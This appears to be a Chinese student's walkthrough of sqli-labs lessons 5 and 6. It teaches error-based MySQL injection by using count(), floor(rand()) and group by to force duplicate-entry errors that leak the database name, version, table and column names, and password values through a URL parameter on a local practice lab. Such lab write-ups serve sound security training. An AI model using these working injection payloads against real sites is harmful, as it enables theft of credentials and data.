lesson 5&6(本章的重点在于如何构造使其产生错误,从而得到我们需要的信息)
id=1’ 报错 r ’ ’ 1’ ’ LIMIT 0,1 ’ at line 1
猜测 select usename,password from table where id='input'
id=1’ and 1=1 –+ 返回正常 id=1’ and 1=2 –+ 错误
判断字段 order by 3正确 order by 4 错误 3个字段
二.基于错误的sql语句构造
**几个重要的函数
——count():统计元组的个数
+----------+
| count(*) |
+----------+
| 285 |
+----------+
从information_schema.tables统计元组个数有多少
——rand(): 用于产生一个0~1的随机数
mysql> select rand();
+--------------------+
| rand() |
+--------------------+
| 0.9833602495336535 |
+--------------------+
1 row in set (0.00 sec)
——floor(): 向下取整
mysql> select floor(rand());
+---------------+
| floor(rand()) |
+---------------+
| 0 |
+---------------+
1 row in set (0.00 sec)
mysql> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
| 1 |
+-----------------+
1 row in set (0.00 sec)
——group by:一句我们想要的规则对结果进行分组
mysql> select table_name,table_schema from information_schema.tables group by table_schema;
+----------------+--------------------+
| table_name | table_schema |
+----------------+--------------------+
| ia3nznrjd4 | challenges |
| CHARACTER_SETS | information_schema |
| columns_priv | mysql |
| accounts | performance_schema |
| emails | security |
| host_summary | sys |
+------------------------+-------------------------+
6 rows in set (0.01 sec)
在information_schema中选择table_name与table_schema,并且按照table_schema
进行排序,在table_name中显示table_chema中的第一个表
进入mysql命令行
use security;
select database();
select group_concat(0x3a,0x3a,database(),0x3a)name;
(0x3a 是分号的,表头太长取一个别名name)
+-------------+
| name |
+-------------+
| ::security: |
+-------------+
接下来我们向里面添加刚才的随机数函数
select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name;
+--------------+
| name |
+--------------+
| ::security:1 |
+--------------+
我们再增加一点内容
select group_concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables;
informaition.tables 有多少条记录security显示多少次 随机数就执行多少次。
为了让显示更有序 我们换成排列 concat
select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables;
对结果分组 以那么分组
select concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from informaition_schema.tables group by name;
加一个count统计
select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name;
多刷新几次 发现报错了,报错的信息有数据库的名字 那么我们可以的到更多信息
ERROR 1062 (23000): Duplicate entry '::security:0' for key '<group_key>'
我们将database换成version
select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;
ERROR 1062 (23000): Duplicate entry '::5.7.19:1' for key '<group_key>'
为了得到想要查询的东西
比如说添加一个复杂的查询语句
select count(*),concat(0x3a,0x3a,version(),0x3a,floor(rand()*2))name from information_schema.tables group by name;
将version()换为(select table_name from information_schema.tables where table_schema=database() limit 0,1)
报错得到信息 继续查看其他信息 修改limit参数
回到sql注入 继续使用
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name) --+
报错:Operand should contain 1 column(s) 操作应包含一列
{
kc表是一个数据表,假设表的行数为10行。
select 1 from kc 增加临时列,每行的列值是写在select后的数,这条sql语句中是1
}
我们增加一列
http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)) --+
报错: Every derived table must have its own alias 每个派生表必须有自己的别名
修改如下
?id=1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,floor(rand()*2))name from information_schema.tables group by name)b) --+
报错得到数据库名 Duplicate entry ::security:0 for key'
按照之前的想法我们把database() 换成更复杂的语句
(select table_name from information_schema.tables where table_schema=database() limit 0,1)
Duplicate entry '::emails:0' for key '' 得到表名email 修改limit得到第二个表
Duplicate entry '::users:1' for key ''
为了得到user表里面的列名 修改一下
(select column_name from information_schema.columns where table_name='users' limit 0,1)
Duplicate entry '::USER:0' for key ''得到了其中的user列名 修改得到其他列名 得到password列名
获取字段内容
(select password from users limit 0,1) 得到 Duplicate entry '::Dumb:1' for key ''
介绍完了 基于错误的 sql注入 lesson6 改为双引号就可以了
这里为什么会报错 是mysql的一个bug http://bugs.mysql.com/bug.php?id=32249